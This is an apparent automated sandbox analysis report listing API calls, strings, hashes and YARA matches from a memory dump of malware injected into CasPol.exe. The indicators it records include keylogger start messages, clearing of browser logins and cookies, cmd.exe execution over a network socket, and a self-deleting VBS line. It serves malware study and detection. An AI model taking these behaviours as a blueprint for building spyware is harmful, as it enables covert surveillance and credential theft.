                                                                                                                      • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                      • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                      • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                      APIs
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                      • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                      • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                        • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                        • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                      • String ID: (FG
                                                                                                                      • API String ID: 3142014140-2273637114
                                                                                                                      • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                                                                                                                      • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                      • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                                                                                                                      • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                      APIs
                                                                                                                      • _strpbrk.LIBCMT ref: 0044D4B8
                                                                                                                      • _free.LIBCMT ref: 0044D5D5
                                                                                                                        • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                                                                                        • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                                                                                                                        • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                      • String ID: *?$.
                                                                                                                      • API String ID: 2812119850-3972193922
                                                                                                                      • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                      • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                                                                                                      • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                      • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                                                                                                      APIs
                                                                                                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                        • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                        • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                        • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                      • String ID: XCG$`AG$>G
                                                                                                                      • API String ID: 2334542088-2372832151
                                                                                                                      • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                                                                                                                      • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                      • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                                                                                                                      • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
                                                                                                                      • _free.LIBCMT ref: 004427EF
                                                                                                                      • _free.LIBCMT ref: 004427F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      • API String ID: 2506810119-3657627342
                                                                                                                      • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                      • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                      • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                      • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                        • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                        • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                      • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                      • API String ID: 368326130-2663660666
                                                                                                                      • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                                                                                                                      • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                      • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                                                                                                                      • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread$LocalTimewsprintf
                                                                                                                      • String ID: Offline Keylogger Started
                                                                                                                      • API String ID: 465354869-4114347211
                                                                                                                      • Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                                                                                                                      • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                      • Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                                                                                                                      • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                      • String ID: Online Keylogger Started
                                                                                                                      • API String ID: 112202259-1258561607
                                                                                                                      • Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                                                                                                                      • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                      • Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                                                                                                                      • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                      • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                      • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                      • String ID: `@
                                                                                                                      • API String ID: 2583163307-951712118
                                                                                                                      • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                      • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                      • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                      • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandleObjectSingleWait
                                                                                                                      • String ID: Connection Timeout
                                                                                                                      • API String ID: 2055531096-499159329
                                                                                                                      • Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                                                                                                                      • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                      • Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                                                                                                                      • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                        • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                        • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                      • String ID: bad locale name
                                                                                                                      • API String ID: 3628047217-1405518554
                                                                                                                      • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                                                                                                      • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                      • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                                                                                                      • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                      APIs
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExecuteShell
                                                                                                                      • String ID: /C $cmd.exe$open
                                                                                                                      • API String ID: 587946157-3896048727
                                                                                                                      • Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                                                                                                                      • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                      • Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                                                                                                                      • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                      APIs
                                                                                                                      • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                      • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                      • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TerminateThread$HookUnhookWindows
                                                                                                                      • String ID: pth_unenc
                                                                                                                      • API String ID: 3123878439-4028850238
                                                                                                                      • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                      • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                      • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                      • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetLastInputInfo$User32.dll
                                                                                                                      • API String ID: 2574300362-1519888992
                                                                                                                      • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                      • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                      • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                      • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1036877536-0
                                                                                                                      • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                                      • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                      • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                                      • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                      • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                      • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                      • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                      • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                      • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                      • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                      APIs
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3360349984-0
                                                                                                                      • Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                                                                                                                      • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                      • Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                                                                                                                      • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                      • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                      • API String ID: 3472027048-1236744412
                                                                                                                      • Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                                                                                                                      • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                      • Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                                                                                                                      • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQuerySleepValue
                                                                                                                      • String ID: @CG$exepath$BG
                                                                                                                      • API String ID: 4119054056-3221201242
                                                                                                                      • Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                                                                                                                      • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                      • Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                                                                                                                      • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                        • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                        • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$SleepText$ForegroundLength
                                                                                                                      • String ID: [ $ ]
                                                                                                                      • API String ID: 3309952895-93608704
                                                                                                                      • Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                                                                                                                      • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                      • Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
                                                                                                                      • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3604237281-0
                                                                                                                      • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
